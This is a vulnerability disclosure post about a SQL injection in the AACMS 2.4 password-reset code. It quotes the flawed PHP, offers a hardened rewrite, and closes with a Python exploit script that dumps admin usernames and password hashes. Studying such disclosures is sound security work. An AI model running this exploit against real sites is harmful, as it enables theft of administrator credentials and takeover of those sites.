AACMS 2.4 Injection Vulnerability

Category: lcx

    By: Cond0r

    This is my first time hunting for a vulnerability, so I picked a small one; experts, please go easy on me.

user.action.php, around line 98:

elseif ($act == 'repassword') {
        // $_REQUEST['email'] is interpolated directly into the SQL string: the injection point
        $uid = $db->getOne("SELECT uid FROM $_SC[tablepre]members WHERE email='$_REQUEST[email]'"); // obvious...

        if ($uid) {
                echo $uid; // the looked-up uid is echoed straight back to the client
                $password = random(6);

                $smtpemailto = $_REQUEST['email'];
                $mailsubject = '找出密码 - AACMS';
                $mailbody = '您的密码为:' . $password . '
本邮件为系统自动所发,请勿回复!';
                include(S_ROOT . 'include/send_mail.php');

                // the new password is stored as an unsalted md5 hash
                $db->update("$_SC[tablepre]members", array('password' => md5($password)), 'uid=' . $uid);

                echo '邮箱发送成功,请查收!';
        } else {
                echo '邮箱未被使用!';
        }
}
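For comparison, here is a hardened rewrite of the same branch. This is an added example, not AACMS code: it assumes a PDO connection `$pdo` and a table prefix `$prefix` supplied by the application bootstrap, in place of the project's own `$db->getOne()` wrapper and `$_SC[tablepre]`. The email address is validated before it reaches the database and then bound as a parameter, so it can no longer alter the query; the uid is no longer echoed; and the response is the same whether or not the address exists, so the endpoint stops confirming which emails are registered. The md5 hash is kept only so the existing login check in the CMS keeps working; `password_hash()` would be the next step, together with a change to that login check.

```php
<?php
// Added example (not AACMS code): hardened version of the act=repassword branch.
// Assumed: $pdo (PDO connection) and $prefix (table prefix, e.g. "cms_") come
// from the application bootstrap; send_mail() stands in for the project's mailer.

function lookup_uid_by_email(PDO $pdo, string $prefix, string $email): ?int
{
    // Reject anything that is not a syntactically valid address before it
    // reaches the database. The original code let the raw $_REQUEST['email']
    // straight into the SQL string.
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    // Identifiers cannot be bound as parameters, so restrict the prefix to a
    // safe character set instead of interpolating it unchecked.
    if (!preg_match('/^[A-Za-z0-9_]*$/', $prefix)) {
        throw new InvalidArgumentException('invalid table prefix');
    }
    // Bound parameter: the value is sent separately from the query text.
    $stmt = $pdo->prepare("SELECT uid FROM {$prefix}members WHERE email = :email LIMIT 1");
    $stmt->execute([':email' => $email]);
    $uid = $stmt->fetchColumn();
    return $uid === false ? null : (int) $uid;
}

function reset_password(PDO $pdo, string $prefix, string $email): bool
{
    $uid = lookup_uid_by_email($pdo, $prefix, $email);
    if ($uid === null) {
        return false;
    }
    // CSPRNG instead of the project's random(6) (assumed to be non-cryptographic).
    $password = bin2hex(random_bytes(6));
    // md5 is kept only so the CMS's unchanged login check still matches;
    // password_hash($password, PASSWORD_DEFAULT) is the proper replacement.
    $stmt = $pdo->prepare("UPDATE {$prefix}members SET password = :hash WHERE uid = :uid");
    $stmt->execute([':hash' => md5($password), ':uid' => $uid]);
    send_mail($email, '找出密码 - AACMS', '您的密码为:' . $password); // hypothetical mailer
    return true;
}

// Handler: the uid is not echoed, and the message does not depend on whether
// the address exists, so the endpoint no longer enumerates registered emails.
$email = (string) ($_REQUEST['email'] ?? '');
reset_password($pdo, $prefix, $email);
echo '如果该邮箱已注册,新密码已发送,请查收!';
```

The uniform response is a deliberate trade-off: the original branch printed a different message (and the uid) for known and unknown addresses, which turns the password-reset form into an account-enumeration oracle even after the injection itself is fixed.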

    The exploit is written in Python; it requires the sqlerror helper module that it imports.

#!/usr/bin/python
# Python 2 script (print statements); sqlerror is the author's own
# error-based injection helper and is not part of the standard library.
import sqlerror
from sys import argv

sql = sqlerror.errorinj()
try:
    site = argv[1]

    # the vulnerable parameter is the email value of act=repassword
    url = site + "/user.action.php?act=repassword&email="
    database = sql.getdatabase(url)
    table = ["username", "password"]
    for t in table:
        sql.strgetdata(url, "cms_admins", t, database)

except:
    # reached when no site argument is given (bare except also swallows other errors)
    print "Usage: " + argv[0] + " http://127.0.0.1/"
    print "Usage: " + argv[0] + " http://127.0.0.1/aacms"
'''
# older variant left commented out by the author
url = site + "/user.action.php?act=repassword&email="
print url
database = sql.strgetdatabase(url)
table = ["username", "password"]
for t in table:
    sql.strgetdata(url, "cms_admins", t, database)
'''

    http://t00ls.net/thread-18866-1-1.html

Article source: lcx.cc, "AACMS 2.4 Injection Vulnerability"
